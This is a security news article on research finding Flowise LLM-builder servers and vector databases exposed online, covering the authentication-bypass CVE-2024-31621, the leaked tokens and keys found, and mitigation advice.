Unprotected LLM Servers Expose Sensitive Corporate and Health Data

August 28, 2024

A large number of open-source large language model (LLM) builder servers and vector databases are unintentionally exposing sensitive data on the internet. This is a consequence of the hasty integration of AI into business workflows, often without sufficient focus on securing these tools and the information they handle.

A recent study by Legit security researcher Naphtali Deutsch revealed this trend by scanning the web for two types of potentially vulnerable open-source AI services: vector databases and LLM application builders. The researcher focused specifically on the open-source program Flowise. The study uncovered a wealth of sensitive personal and corporate data that organizations had inadvertently exposed in their rush to leverage generative AI.

Deutsch explains that many programmers see these tools online and attempt to set them up in their own environment, often neglecting security considerations in the process. Flowise is a popular tool for building various types of LLM applications. It is supported by Y Combinator and has tens of thousands of stars on GitHub. The applications built with Flowise often handle and manage large volumes of data, making security paramount.

An authentication bypass vulnerability in Flowise versions 1.6.2 and earlier, tracked as CVE-2024-31621, was discovered earlier this year. This vulnerability, which can be exploited by simply capitalizing a few characters in the program's API endpoints, earned a 'high' 7.6 score on the CVSS Version 3 scale. By exploiting CVE-2024-31621, Deutsch was able to access 438 Flowise servers. These servers contained GitHub access tokens, OpenAI API keys, Flowise passwords and API keys in plaintext, configurations and prompts associated with Flowise apps, and more.

Vector databases, which store any type of data an AI app might need, are also vulnerable to direct attacks when accessible from the web. Deutsch discovered approximately 30 vector database servers online without any authentication checks, containing clearly sensitive information.

To reduce the risk of exposed AI tools, Deutsch suggests that organizations limit access to their AI services, monitor and log activity related to these services, protect sensitive data handled by LLM apps, and always apply software updates where possible. He warns that these tools are new, and people often lack knowledge about how to set them up securely. He also points out that while setting up these databases is becoming easier, security measures are often more complex and can lag behind.

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.